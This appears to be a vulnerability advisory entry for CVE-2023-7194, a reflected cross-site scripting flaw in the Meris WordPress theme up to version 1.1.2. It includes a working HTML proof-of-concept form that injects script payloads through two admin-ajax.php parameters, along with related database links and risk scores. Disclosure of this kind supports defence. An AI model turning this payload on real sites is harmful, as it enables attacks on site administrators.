Lucene search
Angelo DelicatoWPEX-ID:E20292AF-939A-4CB1-91E4-5FF6AA0C7FBEHistoryJan 01, 2024 - 12:00 a.m.
Meris <= 1.1.2 - Reflected XSS
2024-01-0100:00:00
Angelo Delicato
42
meris
reflected xss
admin-ajax.php
file upload
Description The theme does not sanitise and escape some parameters before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=meris_widget_area_generator" method="POST" enctype="multipart/form-data">
<input type="hidden" name="areaname" value="<script>alert(/XSS-areaname/)</script>" />
<input type="hidden" name="num" value='"><script>alert(/XSS-num/)</script>' />
<input type="submit" value="XSS PoC" />
</form>
</body>
</html>Related
wpvulndb
wpvulndb
Meris <= 1.1.2 - Reflected XSS
2024-01-01 00:00:00
nvd
nvd
CVE-2023-7194
2024-01-22 20:15:47
prion
prion
Cross site scripting
2024-01-22 20:15:00
cvelist
cvelist
CVE-2023-7194 Meris <= 1.1.2 - Reflected XSS
2024-01-22 19:14:25
cve
cve
CVE-2023-7194
2024-01-22 20:15:47
wordfence
wordfence
AI Score
8.7
Confidence
High
EPSS
0.001
Percentile
17.0%
Related for WPEX-ID:E20292AF-939A-4CB1-91E4-5FF6AA0C7FBE